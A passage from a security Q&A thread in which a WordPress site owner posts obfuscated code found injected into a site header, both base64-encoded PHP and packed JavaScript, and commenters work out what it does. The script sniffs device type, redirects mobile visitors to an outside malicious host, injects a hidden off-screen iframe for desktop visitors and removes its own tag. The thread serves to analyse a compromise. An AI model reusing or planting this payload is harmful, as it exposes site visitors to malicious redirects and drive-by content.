22

I am not sure if this is the correct place to ask a questions such as this, apologies if it isn't.

I have found the below code in the header of one of my wordPress websites, I am pretty sure it is malicious and I have removed it. However I am curious and I can't work out what is purpose is.

Is anyone able to provide any ideas?

Base 64 Encoded:

CmZ1bmN0aW9uIHVzZXJfYWJvcnRfZW5kX2V4aXRfb3BlcmF0aW9uaWRfODgwNzkwNigpCnsKICAgIGVjaG8gYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHbGtQU0pwWkY4NE9EQTNPVEEySWo1bGRtRnNLR1oxYm1OMGFXOXVLSEFzWVN4akxHc3NaU3hrS1h0bFBXWjFibU4wYVc5dUtHTXBlM0psZEhWeWJpaGpQR0UvSnljNlpTaHdZWEp6WlVsdWRDaGpMMkVwS1NrcktDaGpQV01sWVNrK016VS9VM1J5YVc1bkxtWnliMjFEYUdGeVEyOWtaU2hqS3pJNUtUcGpMblJ2VTNSeWFXNW5LRE0yS1NsOU8ybG1LQ0VuSnk1eVpYQnNZV05sS0M5ZUx5eFRkSEpwYm1jcEtYdDNhR2xzWlNoakxTMHBlMlJiWlNoaktWMDlhMXRqWFh4OFpTaGpLWDFyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLWHRwWmloclcyTmRLWHR3UFhBdWNtVndiR0ZqWlNodVpYY2dVbVZuUlhod0tDZGNYR0luSzJVb1l5a3JKMXhjWWljc0oyY25LU3hyVzJOZEtYMTljbVYwZFhKdUlIQjlLQ2R4SURGMFBUTjRLRW9vS1h0bUtHb3VUU0U5TVVrbUprd2dhaTVOSVQwaVN5SXBlek41S0RGMEtUdG1LRXdnUVZzaU1VRWlYVDA5SWtzaUtYdEJXeUl4UVNKZFBURTdjU0F4Tnowb01UWW9LU1ltTVZJb0tTazdjU0F4VkQwaE1UY21KaUVoUVM0emVpWW1RUzVGTGpOM1BUMDlJak4ySUROeUxpSTdjU0F4YWowdE1UdHhJRWM5SWpOek9pOHZNM1F1TTNVdk0wRWlPMllvVnlncEppWXhhajA5TVNsN1ppZ29SUzVPTGpGdktDOHpRaTlwS1NsOGZDaEZMazR1TVc4b0x6TklMMmtwS1NsN01Ua3VNMGtvUnlsOWVudEJMakU1UFVjN2FpNHhPVDFIZlgxNmUyWW9LREUzSmlZaE1WUW1KaUZYS0NrcEtYdHhJRk05SWp3eE1TQXpTajFjWENJelJ6b3pSanN6UXpvdE0wUTdYRndpUGp3eGVTQXpSVDFjWENJeGJGeGNJaUF6Y1QxY1hDSWlLMGNySWx4Y0lpQXpjRDFjWENJeGJGeGNJajQ4THpGNVBqd3ZNVEUrSWp0eElFazlhaTR6WWlnaU1URWlLVHRtS0VrdU1XMDlQVEFwZTJvdVRTNVFQV291VFM1UUsxTjllbnR4SURGT1BVa3VNVzA3Y1NCU1BUTmpMak5rS0NneFRpOHlLU2s3U1Z0U1hTNVFQVWxiVWwwdVVDdFRmWDE5ZlRGTktDbDlmU3d6WVNrN1NpQXhUU2dwZTNFZ1ZUMGlNemtpTzJZb1ZTRTlJak0xSWlsN2NTQklQV291TXpZb1ZTazdaaWhNSUVnaFBVc21Ka2doUFRGSktYdElMak0zUFNJaU96TTRJRWg5ZlgwN1NpQXhVaWdwZTJZb2FpNUVKaVloYWk0elpTbDdlQ0JDZlhvZ1ppaHFMa1FtSmlGQkxqTm1LWHQ0SUVKOWVpQm1LR291UkNZbUlXb3VNMjBwZTNnZ1FuMTZJR1lvYWk1RUppWWhhaTR6YmlsN2VDQkNmWG9nWmlocUxrUW1KaUZCTGpOdktYdDRJRUo5ZWlCbUtHb3VSQ2w3ZUNCQ2ZYb2daaWhNSUVVdU0yd2hQU0pMSWlZbUlXb3VSQ1ltTVRZb0tTbDdlQ0JDZlhwN2VDQXhZbjE5U2lBeE5pZ3BlM0VnZVQxQkxrVXVUanR4SUZFOWVTNURLQ0l6YXlBaUtUdG1LRkUrTUNsN2VDQmFLSGt1V1NoUkt6VXNlUzVES0NJdUlpeFJLU2tzTVRBcGZYRWdNV3M5ZVM1REtDSXpaeThpS1R0bUtERnJQakFwZTNFZ01UUTllUzVES0NJemFEb2lLVHQ0SUZvb2VTNVpLREUwS3pNc2VTNURLQ0l1SWl3eE5Da3BMREV3S1gxeElFODllUzVES0NJemFTOGlLVHRtS0U4K01DbDdlQ0JhS0hrdVdTaFBLelVzZVM1REtDSXVJaXhQS1Nrc01UQXBmWGdnTVdKOVNpQlhLQ2w3Y1NBeFlUMUJMa1V1VGk0emFpZ3BPMllvTHlnelMzd3pURnhjWkN0OE5HZ3BMaXN4YUh3MGFYdzBhbHhjTDN3MFozdzBabncwWW53MFkzdzBaSHd6Tkh3MGEzd3hkU2cwYkh3eFpDbDhNWEo4TkhKOE5ITWdmRFIwZkRSeGZEUndmREZvTGlzMGJYdzBibncwYnlCdEtEUmhmRFE0S1dsOE0xTW9JREZQS1Q5OE0xUjhjQ2d6Vlh3elVpbGNYQzk4TTFGOE0wMThNMDU4TTA4b05IdzJLVEI4TTFCOE0xWjhNVWhjWEM0b00xZDhORE1wZkRRMGZEUTJmRFF5SURReGZETllmRE5aTDJrdU1VTW9NV0VwZkh3dk0xcDhOSFY4TWt0OE1tWjhNbUY4TlRCYk1TMDJYV2w4TWpoOE1WWjhZU0F4VUh3eFdId3hkeWd4VVh3eGVIeHpYRnd0S1h3eFV5Z3lZbnd5YXlsOE1XY29NbTE4TVc1OE1YWXBmREp1ZkRKa0tESmxmRlo4TW1NcGZESnBmREZtS0RKc2ZERmpLWHd4V2loVWZESnZLWHd4VjN3eFdTZ3ljSHhjWEMxdGZISWdmSE1nS1h3eWNYd3laeWd4Vlh3eGNId3lhQ2w4TVVJb01tcDhNaklwZkRJektERjNmREk1S1h3eU55aGxmSFlwZDN3eU5ud3lORnhjTFNodWZIVXBmREkxWEZ3dmZETXpmREpSZkRKU1hGd3RmREpRZkRKUGZESk1mREpOWEZ3dGZERjJLREpPZkRGRktYd3lXbnd5VmlneFpYd3hjSHd5V0NsOE1uaDhNbmxjWEMxemZESjZmREozZkRKMmZERnBLR044Y0NsdmZESnpLREV5ZkZ4Y0xXUXBmREoxS0RRNWZERlRLWHd5UWlneVNId3lTU2w4TVZFb01rUjhNa1VwZkRKRGZESkdLRnMwTFRkZE1Id3hUM3d4VUh3eVJ5bDhNa0Y4TW5Rb1hGd3RmREZ4S1h3eFRDQjFmREpLZkRKWGZESlpYRnd0Tlh4blhGd3RNVFY4TVdNb1hGd3VkM3d4WkNsOE16RW9NekI4TWxVcGZESnlmREpVZkRKVFhGd3RLRzE4Y0h4MEtYdzBaVnhjTFh3MFJDZ3hSM3d4UmlsOE5tMG9JR2w4TVhVcGZEWnVYRnd0WTN3MmJ5aGpLRnhjTFh3Z2ZERnhmR0Y4WjN4d2ZITjhkQ2w4Tm1zcGZEWm9LRFpwZkRacUtYeHBYRnd0S0RJd2ZERmpmRmdwZkRaeGZEUjJLQ0I4WEZ3dGZGeGNMeWw4Tm5kOE5uaDhObmw4Tm5aOE5uVjhObko4Tm5OOE1YSjhOblFvZEh4MktXRjhObWQ4Tm1aOE5qSjhOak44TmpSOE5Wb29JSHhjWEM4cGZEVlZmRFZXSUh3MVYxeGNMWHcxV0NoamZHc3BmRFkxS0RZMmZEWmpLWHcyWkNnZ1ozeGNYQzhvYTN4c2ZIVXBmRFV3ZkRVMGZGeGNMVnRoTFhkZEtYdzJPSHcyT1h3MmVseGNMWGQ4TnpKOE56TmNYQzk4V0NoVWZEYzBmRGN4S1h3eGVpaEdmREl4ZkRGdUtYeHRYRnd0TmxwOE5sY29ObGg4TVVRcGZEYzFLRGMyZkRkamZERktLWHczWlh3eE5TaEdmRGRrZkRGQ2ZEZGlmREZwZkhRb1hGd3RmQ0I4YjN4MktYdzNOeWw4Tnpnb05UQjhObFY4ZGlBcGZEWlVmRFpIZkRaSVd6QXRNbDE4TmtsYk1pMHpYWHcyUmlnd2ZESXBmRFpGS0RCOE1udzFLWHcyUWlnd0tEQjhNU2w4TVRBcGZEWkRLQ2hqZkcwcFhGd3RmRFpFZkRaS2ZEWkxmRFpSZkRaU0tYdzJVeWcyZkdrcGZEWlBmRFpNZkRaTktEWk9mRFZVS1h3MVUzdzBWM3cwV0h3MFdTaGhmR1I4ZENsOE5GVjhORklvTVROOFhGd3RLRnN4TFRoZGZHTXBLWHcwV253MU1Yd3hTeWcxWVh3MVlpbDhOV05jWEMweWZEVTVLREZWZkRVNGZERnpLWHcxTlh3MU5ud3hSMXhjTFdkOE5UZGNYQzFoZkRSUUtEUkRmREV5ZkRJeGZETXlmRFl3ZkZ4Y0xWc3lMVGRkZkdsY1hDMHBmRFI0ZkRSNWZEUjZmRFJHZkRSSGZEUk5LRFJPZkRSUEtYdzBURnhjTDN3MFN5ZzBTSHhZZkRSSmZEUktmRlo4TldRcGZEVmxLRVo4YUZ4Y0xYd3hlSHh3WEZ3dEtYdzFSMXhjTDN3eGN5aGpLRnhjTFh3d2ZERXBmRFEzZkRGNmZERkZmREZFS1h3MVFWeGNMWHcxUW53MVF5aGNYQzE4YlNsOE5VbGNYQzB3ZkRWS0tEUTFmRFZSS1h3MVVpZ3haM3d4Wm53MVQzd3haWHcxVGlsOE5Vc29OVXg4VmlsOE5VMG9SbnhvWEZ3dGZIWmNYQzE4ZGlBcGZEVjVLRVo4Tld3cGZEVnRLREU0ZkRVd0tYdzFiaWcxYTN3eE1Id3hPQ2w4TVVZb05XZDhOV2dwZkRWcFhGd3RmRFZ2WEZ3dGZEVndLR2w4YlNsOE5YWmNYQzE4ZEZ4Y0xURTFmRFY0S0RGTGZEVjFLWHd4U2lnM01IeHRYRnd0ZkRWeGZEVnlLWHcxYzF4Y0xUbDhNVWdvWEZ3dVlud3hUSHcxZWlsOE5WQjhOVVI4TlVWOE5GWjhObVVvTm5COFZDbDhObXdvTkRCOE5Wc3dMVE5kZkZ4Y0xYWXBmRFYwZkRWM2ZEVm1mRFZxS0RVeWZEVXpmRFl3ZkRZeGZEY3dmRFZJZkRWR2ZEUjNmRFJCZkRSQ0tYdzBSU2hjWEMxOElDbDhORkY4TkZSOE5GTW9aeUI4TmxCOE56a3BmRGRoZkRaWmZEWldmRFpCWEZ3dGZEWTNmRFpoZkRaaVhGd3RMMmt1TVVNb01XRXVOVmtvTUN3MEtTa3BlM2dnUW4xNElERmlmU2NzTmpJc05EUTVMQ2Q4Zkh4OGZIeDhmSHg4Zkh4OGZIeHBabng4Zkh4a2IyTjFiV1Z1ZEh4OGZIeDhmSHgyWVhKOGZIeDhmSHg4Y21WMGRYSnVmSHBDYmtkalVrdHVWV3RuVjJWeFIxTnpSVUZ3VTI1NGRFNXBUVmh4Wm10SGVWbDhaV3h6Wlh4M2FXNWtiM2Q4ZEhKMVpYeHBibVJsZUU5bWZHRnNiSHh1WVhacFoyRjBiM0o4TURGOFdHWllhRVZRU205RWNXbDVabVZTYW0xaVlXNTZVVzVHU2tKdFEwNVRaV1pJWTIxNmNteDhXbXRIU1VSWlExSlhXWGxwU2xsUFZVcEtZM0p1U0VoalMySm9UMXB4VGtGclMwcEVmR3hTWVVabVMwMXFaV2hCY1hGWlZtcFhURnBaVjJGNVdGRndSbUpuU0V4TVZYVnVZM3htZFc1amRHbHZibngxYm1SbFptbHVaV1I4ZEhsd1pXOW1mR0p2WkhsOGRYTmxja0ZuWlc1MGZGSkZWa3hIY1dad2RXNWxkV0ZoU2tWWVNGTkhjRmR1VVdwYVlWcFdVMnRHZkdsdWJtVnlTRlJOVEh4VVFXSnBURk5aVm5aMVRuZEphV2xZZDJsSlVXNW1URU40WVVKRGNuTnZkVk40Y2xOMVNIeHRTazl6UldsYVluVlJhR2xKVkhOWGNGRmFXRWRhWVZKNlZteFFkR3RUVWtaNFRIUm1SM2w4UkdWelZYRjFTMUZLWjBKYWFtOXpVMGhRVjJOU1ZtZDZlVzFoVjNkeVJVbHRWbWw0YjBoMGZIUmxmSFpuV25aNWFrTmtla1JYZDBKMVpFaEZhM1JDYm1GaFoxbFpXV0p1V25oQ2ZHNTVmRXhEU0hGVFNsaG9TWGwxWkhKWGVtOWlTa1JUUTI5WloyZEdjV0ZQU25WU2FXTlBiM3h0WVh4emRXSnpkSEpwYm1kOGNHRnljMlZKYm5SOGZHUnBkbng4ZkVGemFtSm9TMDlzVEZCclJVcHJhWEZuZVVGRlRteEtaMEoxZG5aMVJGRkJmRzF2ZkVweFJrOVhaVWRLVm1wbmJHZFlTbWRpYlZkTlQwOW5jbnBQYW0xNWQwRjViM3hEWVVWYWNraGFjRnBZWjNOUlJsVkVkMU5hVjNKaFQyeG9Za0p5Ukc5QmQzbHRmSHhzYjJOaGRHbHZibnh3UzBwUmRFNTNaRzlDV2twT2NHcDVZMGxZVjI5VmNHdGxhV1pWU1hKYWJFVjhabUZzYzJWOFoyOThiMlI4YVhSOFlYSjhZV3g4Ylc5aWFXeGxmR1J2ZkZwTWRXaHZXSHBrWkdOU1VrcEdjMXBKZEVwS1pITnBTRmxIUjI5QlZWUjhablp4YW1KelRVeGFkMUZvYWtadFdubDNaa3B3VUVwQ2RtRlpUazVRUVdKclRYd3lNWEI0Zkd4bGJtZDBhSHhqWVh4dFlYUmphSHhzYkh4ZmZHbHlhWE44YzJWOGFuaFFiMmRNY205bFdGRjJjRmhyYldkMWJHcGFiMGRUVG01SlVVdFJWWFI4YVhCOFkyOThZV044YjI5OGFXWnlZVzFsZkcxamZIWmZZbVEyTm1Jek1tVXhZbU0yWVdRNU1XVXdNVE14T0dVNE1qYzRPVEU0WmpCOFltbDhkR1Z6ZEh4eWFYeHVaSHgwWVh4d2RIeDFjSHh1ZFd4c2ZIUnpmSEJzZkdjeGZIQkpiMjlLZFhOclNITlRTbTV1V0dkbWFWWkZkbk5HY1hGamNWaFJVV3B2ZkdSc1gyNWhiV1Y4YjNOOGQyRjhaWEo4YVZGRWFsTnlWV0YyUkdoellWcHdRVWRCWkhCMWFXTk9TV2wwUVZGamMzZDBRVmg4WVdsOGJtWjRhVXRtWm5sUmFrVklTV2xtV2tKT1NXWmFVSGwyZFZaQlMxaFJRVmRsYWt0NFptdG1aV2g4WTJ0OE9EQXljM3hoZEhSM2ZHRmlZV044WVhWOFlYTjhmSHh5Wkh4aWJIeGlkM3hqTlRWOFluVnRZbnhpY253M056QnpmR0Y2ZkRSMGFIQjhhMjk4ZVhkOFlXNThaWGg4TTJkemIzeGlaWHh1Y1h4aGNIUjFmR3hpZkhKdWZHTm9mR0YyZkdGdGIybDhkWE44WkdsOFlYWmhibnhvWVdsbGZHUnpmR1pzZVh4bGJIeGtiVzlpZkdScFkyRjhaR0owWlh4a1kzeGtaWFpwZkdabGRHTjhaVzE4WlhOc09IeHBZM3hyTUh4bGVueDZaWHhzTW54MWJIeG5OVFl3ZkRZMU9UQjhZMnhrWTN4amJXUjhiWEI4WTJoMGJYeGpaV3hzZkdOamQyRjhZMlJ0Zkdoa2ZHaGphWFI4ZFc1OFpHRjhaMlZ1Wlh4dVozeG5abnhqY21GM2ZHRmtmR2R5Zkh4allYQnBmR2hwY0hSdmNIeHViMjVsZkdkbGRFVnNaVzFsYm5SQ2VVbGtmRzkxZEdWeVNGUk5USHhrWld4bGRHVjhhV1JmT0Rnd056a3dObnd4TURCOFoyVjBSV3hsYldWdWRITkNlVlJoWjA1aGJXVjhUV0YwYUh4bWJHOXZjbnhqYjIxd1lYUk5iMlJsZkZoTlRFaDBkSEJTWlhGMVpYTjBmRlJ5YVdSbGJuUjhjblo4UldSblpYeDBiMHh2ZDJWeVEyRnpaWHhOVTBsRmZHMWhlRlJ2ZFdOb1VHOXBiblJ6ZkhGMVpYSjVVMlZzWldOMGIzSjhZV1JrUlhabGJuUk1hWE4wWlc1bGNueGhkRzlpZkdobGFXZG9kSHh6Y21OOFNXNWpmR2gwZEhCOGJXbDNhMkYyYjNKcGQydGhmRzFzZkVkdmIyZHNaWHgyWlc1a2IzSjhjMlYwU1c1MFpYSjJZV3g4WTJ4bFlYSkpiblJsY25aaGJIeGphSEp2YldWOE1EVXlSbnhwVUdodmJtVjhiR1ZtZEh3eU5qTXdjSGg4ZDJsa2RHaDhZV0p6YjJ4MWRHVjhjRzl6YVhScGIyNThhVkJ2Wkh4eVpYQnNZV05sZkhOMGVXeGxmR0Z1WkhKdmFXUjhZbUo4Y0c5amEyVjBmSEJ6Y0h4elpYSnBaWE44YzNsdFltbGhibnh3YkhWamEyVnlmSEpsZkhCaGJHMThjR2h2Ym1WOGFYaHBmSFJ5Wlc5OFluSnZkM05sY254NFpHRjhlR2xwYm05OE1USXdOM3g4WTJWOGQybHVaRzkzYzN4c2FXNXJmSFp2WkdGbWIyNWxmSHgzWVhCOGZHbHVmSHh2WW54amIyMXdZV3g4Wld4aGFXNWxmR1psYm01bFkzeG9aV2w4WW14aGVtVnlmR0pzWVdOclltVnljbmw4YldWbFoyOThZWFpoYm5SbmIzeGlZV1JoZkdsbGJXOWlhV3hsZkdodmJtVjhabWx5WldadmVIeHVaWFJtY205dWRIeHZjR1Z5WVh4dGJYQjhiV2xrY0h4cmFXNWtiR1Y4YkdkbGZHMWhaVzF2ZkRZek1UQjhhV0ZqZkRnemZIRjBaV3Q4Y2pNNE1IeHlOakF3ZkRnMWZEazRmREEzZkdocGZIY3pZM3h5WVd0emZISnBiVGw4WjJWOGJXMThiWE44YzJGOGN6VTFmSEp2ZkhabGZIcHZmSEZqZkhkbFltTjhjR2Q4ZDJsOGQyaHBkSHh3WkhobmZIWmxjbWw4YjNkbk1YeHdPREF3ZkhCaGJueHdhR2xzZkh4d2FYSmxmSHg4ZkhCeWIzaDhjSE5wYjN4eFlYeHlkSHh3YjN4aGVYeDFZM3h3Ym54MllYeHpZM3gyZFd4amZHZDBmR3hyZkhSamJIeDJlSHd3TUh4dFlueDBNbngwTm54MFpHZDhkR1ZzZkcwemZHMDFmSFI0ZkhadE5EQjhjMmg4ZEdsdGZIWnZaR0Y4ZEc5OGMzbDhjMmw4YzJkb2ZITm9ZWEo4YzJsbGZIWTBNREI4ZGpjMU1IdzRNWHh6Wkd0OE9EQjhjMnQ4YzJ4OGMyOThablI4YzNCOGREVjhZak44ZFhSemRIeHBaSHh6Ylh4dmNtRnVmSGQyZkd0c2IyNThhM0IwZkd0M1kzeHJlVzk4YzNWaWMzUnlmR3RuZEh4OGZHcHBaM044YTJSa2FYeHJaV3BwZkd4bGZHNXZmSGx2ZFhKOGJHbGlkM3hzZVc1NGZIcGxkRzk4ZW5SbGZIaHBmR3huZkhacGZHcGxiWFY4YW1KeWIzeG9kWHhoZDN4MFkzeDBjSHgyYTN4b2NIeG9jM3hvZEh4eVozeHBNak13ZkdsdWJtOThhWEJoY1h4cVlYeHBiVEZyZkdscmIyMThhV0p5YjN4cFpHVmhmR2xuTURGOGJURjhlV0Z6Zkc0M2ZHNWxmRzl1Zkc0MU1IeHVNekI4YlhsM1lYeHVNVEI4YmpJd2ZIUm1mSGRtZkc4eWFXMThiM0I4ZEdsOGJucHdhSHh1WTN4M1ozeDNkSHh1YjJ0OGJYZGljSHh3TVh4NE56QXdmRzFsZkhKamZIZHZiblY4WTNKOGZIaHZmRzB6WjJGOGJUVXdmSFZwZkcxcGZHODRmSHA2ZkcxMGZHNTNmSGR0YkdKOFpHVjhiMkY4TURKOGJXMWxaaWN1YzNCc2FYUW9KM3duS1N3d0xIdDlLU2tLUEM5elkzSnBjSFErJyk7Cn0KCnJlZ2lzdGVyX3NodXRkb3duX2Z1bmN0aW9uKCd1c2VyX2Fib3J0X2VuZF9leGl0X29wZXJhdGlvbmlkXzg4MDc5MDYnKTsKCg==

Actual Code:

<script type="text/javascript" id="id_8807906">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[e(c)] = k[c] || e(c)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
            }
        }
        return p
    }('q 1t=3x(J(){f(j.M!=1I&&L j.M!="K"){3y(1t);f(L A["1A"]=="K"){A["1A"]=1;q 17=(16()&&1R());q 1T=!17&&!!A.3z&&A.E.3w==="3v 3r.";q 1j=-1;q G="3s://3t.3u/3A";f(W()&&1j==1){f((E.N.1o(/3B/i))||(E.N.1o(/3H/i))){19.3I(G)}z{A.19=G;j.19=G}}z{f((17&&!1T&&!W())){q S="<11 3J=\\"3G:3F;3C:-3D;\\"><1y 3E=\\"1l\\" 3q=\\""+G+"\\" 3p=\\"1l\\"></1y></11>";q I=j.3b("11");f(I.1m==0){j.M.P=j.M.P+S}z{q 1N=I.1m;q R=3c.3d((1N/2));I[R].P=I[R].P+S}}}}1M()}},3a);J 1M(){q U="39";f(U!="35"){q H=j.36(U);f(L H!=K&&H!=1I){H.37="";38 H}}};J 1R(){f(j.D&&!j.3e){x B}z f(j.D&&!A.3f){x B}z f(j.D&&!j.3m){x B}z f(j.D&&!j.3n){x B}z f(j.D&&!A.3o){x B}z f(j.D){x B}z f(L E.3l!="K"&&!j.D&&16()){x B}z{x 1b}}J 16(){q y=A.E.N;q Q=y.C("3k ");f(Q>0){x Z(y.Y(Q+5,y.C(".",Q)),10)}q 1k=y.C("3g/");f(1k>0){q 14=y.C("3h:");x Z(y.Y(14+3,y.C(".",14)),10)}q O=y.C("3i/");f(O>0){x Z(y.Y(O+5,y.C(".",O)),10)}x 1b}J W(){q 1a=A.E.N.3j();f(/(3K|3L\\d+|4h).+1h|4i|4j\\/|4g|4f|4b|4c|4d|34|4k|1u(4l|1d)|1r|4r|4s |4t|4q|4p|1h.+4m|4n|4o m(4a|48)i|3S( 1O)?|3T|p(3U|3R)\\/|3Q|3M|3N|3O(4|6)0|3P|3V|1H\\.(3W|43)|44|46|42 41|3X|3Y/i.1C(1a)||/3Z|4u|2K|2f|2a|50[1-6]i|28|1V|a 1P|1X|1w(1Q|1x|s\\-)|1S(2b|2k)|1g(2m|1n|1v)|2n|2d(2e|V|2c)|2i|1f(2l|1c)|1Z(T|2o)|1W|1Y(2p|\\-m|r |s )|2q|2g(1U|1p|2h)|1B(2j|22)|23(1w|29)|27(e|v)w|26|24\\-(n|u)|25\\/|33|2Q|2R\\-|2P|2O|2L|2M\\-|1v(2N|1E)|2Z|2V(1e|1p|2X)|2x|2y\\-s|2z|2w|2v|1i(c|p)o|2s(12|\\-d)|2u(49|1S)|2B(2H|2I)|1Q(2D|2E)|2C|2F([4-7]0|1O|1P|2G)|2A|2t(\\-|1q)|1L u|2J|2W|2Y\\-5|g\\-15|1c(\\.w|1d)|31(30|2U)|2r|2T|2S\\-(m|p|t)|4e\\-|4D(1G|1F)|6m( i|1u)|6n\\-c|6o(c(\\-| |1q|a|g|p|s|t)|6k)|6h(6i|6j)|i\\-(20|1c|X)|6q|4v( |\\-|\\/)|6w|6x|6y|6v|6u|6r|6s|1r|6t(t|v)a|6g|6f|62|63|64|5Z( |\\/)|5U|5V |5W\\-|5X(c|k)|65(66|6c)|6d( g|\\/(k|l|u)|50|54|\\-[a-w])|68|69|6z\\-w|72|73\\/|X(T|74|71)|1z(F|21|1n)|m\\-6Z|6W(6X|1D)|75(76|7c|1J)|7e|15(F|7d|1B|7b|1i|t(\\-| |o|v)|77)|78(50|6U|v )|6T|6G|6H[0-2]|6I[2-3]|6F(0|2)|6E(0|2|5)|6B(0(0|1)|10)|6C((c|m)\\-|6D|6J|6K|6Q|6R)|6S(6|i)|6O|6L|6M(6N|5T)|5S|4W|4X|4Y(a|d|t)|4U|4R(13|\\-([1-8]|c))|4Z|51|1K(5a|5b)|5c\\-2|59(1U|58|1s)|55|56|1G\\-g|57\\-a|4P(4C|12|21|32|60|\\-[2-7]|i\\-)|4x|4y|4z|4F|4G|4M(4N|4O)|4L\\/|4K(4H|X|4I|4J|V|5d)|5e(F|h\\-|1x|p\\-)|5G\\/|1s(c(\\-|0|1)|47|1z|1E|1D)|5A\\-|5B|5C(\\-|m)|5I\\-0|5J(45|5Q)|5R(1g|1f|5O|1e|5N)|5K(5L|V)|5M(F|h\\-|v\\-|v )|5y(F|5l)|5m(18|50)|5n(5k|10|18)|1F(5g|5h)|5i\\-|5o\\-|5p(i|m)|5v\\-|t\\-15|5x(1K|5u)|1J(70|m\\-|5q|5r)|5s\\-9|1H(\\.b|1L|5z)|5P|5D|5E|4V|6e(6p|T)|6l(40|5[0-3]|\\-v)|5t|5w|5f|5j(52|53|60|61|70|5H|5F|4w|4A|4B)|4E(\\-| )|4Q|4T|4S(g |6P|79)|7a|6Y|6V|6A\\-|67|6a|6b\\-/i.1C(1a.5Y(0,4))){x B}x 1b}', 62, 449, '|||||||||||||||if||||document|||||||var|||||||return|zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY|else|window|true|indexOf|all|navigator|01|XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl|ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD|lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc|function|undefined|typeof|body|userAgent|REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF|innerHTML|TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH|mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy|DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt|te|vgZvyjCdzDWwBudHEktBnaagYYYbnZxB|ny|LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo|ma|substring|parseInt||div|||AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA|mo|JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo|CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym||location|pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE|false|go|od|it|ar|al|mobile|do|ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT|fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM|21px|length|ca|match|ll|_|iris|se|jxPogLroeXQvpXkmguljZoGSNnIQKQUt|ip|co|ac|oo|iframe|mc|v_bd66b32e1bc6ad91e01318e8278918f0|bi|test|ri|nd|ta|pt|up|null|ts|pl|g1|pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo|dl_name|os|wa|er|iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX|ai|nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh|ck|802s|attw|abac|au|as|||rd|bl|bw|c55|bumb|br|770s|az|4thp|ko|yw|an|ex|3gso|be|nq|aptu|lb|rn|ch|av|amoi|us|di|avan|haie|ds|fly|el|dmob|dica|dbte|dc|devi|fetc|em|esl8|ic|k0|ez|ze|l2|ul|g560|6590|cldc|cmd|mp|chtm|cell|ccwa|cdm|hd|hcit|un|da|gene|ng|gf|craw|ad|gr||capi|hiptop|none|getElementById|outerHTML|delete|id_8807906|100|getElementsByTagName|Math|floor|compatMode|XMLHttpRequest|Trident|rv|Edge|toLowerCase|MSIE|maxTouchPoints|querySelector|addEventListener|atob|height|src|Inc|http|miwkavoriwka|ml|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2630px|width|absolute|position|iPod|replace|style|android|bb|pocket|psp|series|symbian|plucker|re|palm|phone|ixi|treo|browser|xda|xiino|1207||ce|windows|link|vodafone||wap||in||ob|compal|elaine|fennec|hei|blazer|blackberry|meego|avantgo|bada|iemobile|hone|firefox|netfront|opera|mmp|midp|kindle|lge|maemo|6310|iac|83|qtek|r380|r600|85|98|07|hi|w3c|raks|rim9|ge|mm|ms|sa|s55|ro|ve|zo|qc|webc|pg|wi|whit|pdxg|veri|owg1|p800|pan|phil||pire||||prox|psio|qa|rt|po|ay|uc|pn|va|sc|vulc|gt|lk|tcl|vx|00|mb|t2|t6|tdg|tel|m3|m5|tx|vm40|sh|tim|voda|to|sy|si|sgh|shar|sie|v400|v750|81|sdk|80|sk|sl|so|ft|sp|t5|b3|utst|id|sm|oran|wv|klon|kpt|kwc|kyo|substr|kgt|||jigs|kddi|keji|le|no|your|libw|lynx|zeto|zte|xi|lg|vi|jemu|jbro|hu|aw|tc|tp|vk|hp|hs|ht|rg|i230|inno|ipaq|ja|im1k|ikom|ibro|idea|ig01|m1|yas|n7|ne|on|n50|n30|mywa|n10|n20|tf|wf|o2im|op|ti|nzph|nc|wg|wt|nok|mwbp|p1|x700|me|rc|wonu|cr||xo|m3ga|m50|ui|mi|o8|zz|mt|nw|wmlb|de|oa|02|mmef'.split('|'), 0, {}))
RoraΖ
  • 12,317
  • 4
  • 51
  • 83
bf2mad
  • 401
  • 3
  • 9
  • 1
    Probably related to "packed" http://stackoverflow.com/questions/21423397/what-does-the-custom-functionp-a-c-k-e-d-used-for – Gudradain Oct 15 '15 at 13:31
  • Thanks, I just used http://dean.edwards.name/unpacker/ to unpack it. Seems to be redirecting or opening a window to http://miwkavoriwka.ml/052F based on device type – bf2mad Oct 15 '15 at 13:39
  • 2
    Yes, you've been hacked. You really should get WordFence, a security plugin. I run a few different blogs that come under attack from time to time, and WordFence does an excellent job of keeping bad actors out and alerting you if anything suspicious does get into your site. – Mason Wheeler Oct 15 '15 at 19:16

4 Answers4

21

It seems that the "actual code" you posted is packed using http://matthewfl.com/unPacker.html. When you unpacked it you obtain

var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
